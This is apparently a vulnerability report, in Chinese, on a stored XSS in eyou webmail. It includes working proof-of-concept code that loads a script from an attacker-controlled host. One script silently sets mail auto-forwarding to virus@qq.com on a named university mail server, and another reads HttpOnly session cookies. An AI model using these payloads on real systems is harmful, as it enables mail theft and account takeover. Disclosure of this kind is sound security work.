VULHUB ™

### 简要描述： 新玩意儿，影响Chrome。 在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏，导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。 ### 详细说明： 新玩意儿，影响Chrome。 在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏，导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。内有POC （wooyun上有一些关于eyou邮件正文型XSS的报告，你们给的回应全都是“已有解决方案”、“问题已知，谢谢报告”。然而测试了几所大学的邮件系统，全都没修复，感觉你们是在逗我.....） ### 漏洞证明： 发邮件，Burpsuite拦截，content_html插入一句HTML <link rel="import" href="http://www.129.cc/x.php"> (网站是我本地测试用的,x.php自己可控) [<img src="https://images.seebug.org/upload/201502/021652293099383136047005218eb25b2271bb4f.jpg" alt="2post.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/021652293099383136047005218eb25b2271bb4f.jpg) 1.打开邮件自动设置自动转寄地址POC。 ``` http://www.129.cc/x.php <html> <?php header("Access-Control-Allow-Origin: *"); ?> //关键点，允许跨域 <script> //设置自动转寄 var url = "http://mail.bit.edu.cn/user/?q=settings.forward.do&zid="; var zid = parent.gZid; var data = "forward_email=virus@qq.com&is_save=1&is_opened=1&action=add"; var xhr = new XMLHttpRequest();...

### 简要描述： 新玩意儿，影响Chrome。 在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏，导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。 ### 详细说明： 新玩意儿，影响Chrome。 在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏，导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。内有POC （wooyun上有一些关于eyou邮件正文型XSS的报告，你们给的回应全都是“已有解决方案”、“问题已知，谢谢报告”。然而测试了几所大学的邮件系统，全都没修复，感觉你们是在逗我.....） ### 漏洞证明： 发邮件，Burpsuite拦截，content_html插入一句HTML <link rel="import" href="http://www.129.cc/x.php"> (网站是我本地测试用的,x.php自己可控) [<img src="https://images.seebug.org/upload/201502/021652293099383136047005218eb25b2271bb4f.jpg" alt="2post.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/021652293099383136047005218eb25b2271bb4f.jpg) 1.打开邮件自动设置自动转寄地址POC。 ``` http://www.129.cc/x.php <html> <?php header("Access-Control-Allow-Origin: *"); ?> //关键点，允许跨域 <script> //设置自动转寄 var url = "http://mail.bit.edu.cn/user/?q=settings.forward.do&zid="; var zid = parent.gZid; var data = "forward_email=virus@qq.com&is_save=1&is_opened=1&action=add"; var xhr = new XMLHttpRequest(); xhr.open("POST", url+zid, true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send(data); </script> </html> ``` 刷新网站，截图证明 [<img src="https://images.seebug.org/upload/201502/021653286ba838f7a4b2b14163370695d680a603.jpg" alt="2get.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/021653286ba838f7a4b2b14163370695d680a603.jpg) [<img src="https://images.seebug.org/upload/201502/021654031ab97b61e870057387fe43b607a0ed45.jpg" alt="2get-2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/021654031ab97b61e870057387fe43b607a0ed45.jpg) 2.获取HTTPOnly Cookie 不多说，你们把所有Cookie写在打开邮件后的form里，简直不能理解。截图证明 获取EMPHPSID POC ``` http://www.129.cc/x.php <?php header("Access-Control-Allow-Origin: *"); ?> <script>console.log(parent.document.getElementsByTagName('html')[0].innerHTML);</script> ``` [<img src="https://images.seebug.org/upload/201502/02170257a2125111024eae1c92c82a063a94aded.jpg" alt="2get-3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/02170257a2125111024eae1c92c82a063a94aded.jpg)